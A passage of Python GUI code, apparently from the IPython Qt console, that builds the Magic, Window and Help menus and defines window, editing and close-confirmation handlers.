self.magic_menu_separator = self.magic_menu.addSeparator()
self.all_magic_menu = self._get_magic_menu("AllMagics", menulabel="&All Magics...")
# This action should usually not appear as it will be cleared when menu
# is updated at first kernel response. Though, it is necessary when
# connecting through X-forwarding, as in this case, the menu is not
# auto updated, SO DO NOT DELETE.
self.pop = QtGui.QAction("&Update All Magic Menu ",
self, triggered=self.update_all_magic_menu)
self.add_menu_action(self.all_magic_menu, self.pop)
# we need to populate the 'Magic Menu' once the kernel has answer at
# least once let's do it immediately, but it's assured to works
self.pop.trigger()
self.reset_action = QtGui.QAction("&Reset",
self,
statusTip="Clear all variables from workspace",
triggered=self.reset_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.reset_action)
self.history_action = QtGui.QAction("&History",
self,
statusTip="show command history",
triggered=self.history_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.history_action)
self.save_action = QtGui.QAction("E&xport History ",
self,
statusTip="Export History as Python File",
triggered=self.save_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.save_action)
self.who_action = QtGui.QAction("&Who",
self,
statusTip="List interactive variables",
triggered=self.who_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_action)
self.who_ls_action = QtGui.QAction("Wh&o ls",
self,
statusTip="Return a list of interactive variables",
triggered=self.who_ls_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_ls_action)
self.whos_action = QtGui.QAction("Who&s",
self,
statusTip="List interactive variables with details",
triggered=self.whos_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.whos_action)
def init_window_menu(self):
self.window_menu = self.menuBar().addMenu("&Window")
if sys.platform == 'darwin':
# add min/maximize actions to OSX, which lacks default bindings.
self.minimizeAct = QtGui.QAction("Mini&mize",
self,
shortcut="Ctrl+m",
statusTip="Minimize the window/Restore Normal Size",
triggered=self.toggleMinimized)
# maximize is called 'Zoom' on OSX for some reason
self.maximizeAct = QtGui.QAction("&Zoom",
self,
shortcut="Ctrl+Shift+M",
statusTip="Maximize the window/Restore Normal Size",
triggered=self.toggleMaximized)
self.add_menu_action(self.window_menu, self.minimizeAct)
self.add_menu_action(self.window_menu, self.maximizeAct)
self.window_menu.addSeparator()
prev_key = "Ctrl+Shift+Left" if sys.platform == 'darwin' else "Ctrl+PgUp"
self.prev_tab_act = QtGui.QAction("Pre&vious Tab",
self,
shortcut=prev_key,
statusTip="Select previous tab",
triggered=self.prev_tab)
self.add_menu_action(self.window_menu, self.prev_tab_act)
next_key = "Ctrl+Shift+Right" if sys.platform == 'darwin' else "Ctrl+PgDown"
self.next_tab_act = QtGui.QAction("Ne&xt Tab",
self,
shortcut=next_key,
statusTip="Select next tab",
triggered=self.next_tab)
self.add_menu_action(self.window_menu, self.next_tab_act)
def init_help_menu(self):
# please keep the Help menu in Mac Os even if empty. It will
# automatically contain a search field to search inside menus and
# please keep it spelled in English, as long as Qt Doesn't support
# a QAction.MenuRole like HelpMenuRole otherwise it will lose
# this search field functionality
self.help_menu = self.menuBar().addMenu("&Help")
# Help Menu
self.intro_active_frontend_action = QtGui.QAction("&Intro to IPython",
self,
triggered=self.intro_active_frontend
)
self.add_menu_action(self.help_menu, self.intro_active_frontend_action)
self.quickref_active_frontend_action = QtGui.QAction("IPython &Cheat Sheet",
self,
triggered=self.quickref_active_frontend
)
self.add_menu_action(self.help_menu, self.quickref_active_frontend_action)
self.guiref_active_frontend_action = QtGui.QAction("&Qt Console",
self,
triggered=self.guiref_active_frontend
)
self.add_menu_action(self.help_menu, self.guiref_active_frontend_action)
self.onlineHelpAct = QtGui.QAction("Open Online &Help",
self,
triggered=self._open_online_help)
self.add_menu_action(self.help_menu, self.onlineHelpAct)
# minimize/maximize/fullscreen actions:
def toggle_menu_bar(self):
menu_bar = self.menuBar()
if menu_bar.isVisible():
menu_bar.setVisible(False)
else:
menu_bar.setVisible(True)
def toggleMinimized(self):
if not self.isMinimized():
self.showMinimized()
else:
self.showNormal()
def _open_online_help(self):
filename="http://ipython.org/ipython-doc/stable/index.html"
webbrowser.open(filename, new=1, autoraise=True)
def toggleMaximized(self):
if not self.isMaximized():
self.showMaximized()
else:
self.showNormal()
# Min/Max imizing while in full screen give a bug
# when going out of full screen, at least on OSX
def toggleFullScreen(self):
if not self.isFullScreen():
self.showFullScreen()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(False)
self.minimizeAct.setEnabled(False)
else:
self.showNormal()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(True)
self.minimizeAct.setEnabled(True)
def set_paging_active_frontend(self, paging):
self.active_frontend._set_paging(paging)
def close_active_frontend(self):
self.close_tab(self.active_frontend)
def restart_kernel_active_frontend(self):
self.active_frontend.request_restart_kernel()
def interrupt_kernel_active_frontend(self):
self.active_frontend.request_interrupt_kernel()
def toggle_confirm_restart_active_frontend(self):
widget = self.active_frontend
widget.confirm_restart = not widget.confirm_restart
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def update_restart_checkbox(self):
if self.active_frontend is None:
return
widget = self.active_frontend
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def cut_active_frontend(self):
widget = self.active_frontend
if widget.can_cut():
widget.cut()
def copy_active_frontend(self):
widget = self.active_frontend
widget.copy()
def copy_raw_active_frontend(self):
self.active_frontend._copy_raw_action.trigger()
def paste_active_frontend(self):
widget = self.active_frontend
if widget.can_paste():
widget.paste()
def undo_active_frontend(self):
self.active_frontend.undo()
def redo_active_frontend(self):
self.active_frontend.redo()
def reset_magic_active_frontend(self):
self.active_frontend.execute("%reset")
def history_magic_active_frontend(self):
self.active_frontend.execute("%history")
def save_magic_active_frontend(self):
self.active_frontend.save_magic()
def clear_magic_active_frontend(self):
self.active_frontend.execute("%clear")
def who_magic_active_frontend(self):
self.active_frontend.execute("%who")
def who_ls_magic_active_frontend(self):
self.active_frontend.execute("%who_ls")
def whos_magic_active_frontend(self):
self.active_frontend.execute("%whos")
def print_action_active_frontend(self):
self.active_frontend.print_action.trigger()
def export_action_active_frontend(self):
self.active_frontend.export_action.trigger()
def select_all_active_frontend(self):
self.active_frontend.select_all_action.trigger()
def increase_font_size_active_frontend(self):
self.active_frontend.increase_font_size.trigger()
def decrease_font_size_active_frontend(self):
self.active_frontend.decrease_font_size.trigger()
def reset_font_size_active_frontend(self):
self.active_frontend.reset_font_size.trigger()
def guiref_active_frontend(self):
self.active_frontend.execute("%guiref")
def intro_active_frontend(self):
self.active_frontend.execute("?")
def quickref_active_frontend(self):
self.active_frontend.execute("%quickref")
#---------------------------------------------------------------------------
# QWidget interface
#---------------------------------------------------------------------------
def closeEvent(self, event):
""" Forward the close event to every tabs contained by the windows
"""
if self.tab_widget.count() == 0:
# no tabs, just close
event.accept()
return
# Do Not loop on the widget count as it change while closing
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if self.confirm_exit:
if self.tab_widget.count() > 1:
msg = "Close all tabs, stop all kernels, and Quit?"
else:
msg = "Close console, stop kernel, and Quit?"
info = "Kernels not started here (e.g. notebooks) will be left alone."
closeall = QtGui.QPushButton("&Quit", self)
closeall.setShortcut('Q')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
else:
reply = okay
if reply == cancel:
event.ignore()
return
if reply == okay:
while self.tab_widget.count() >= 1:
# prevent further confirmations:
widget = self.active_frontend
widget._confirm_exit = False
self.close_tab(widget)
event.accept()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.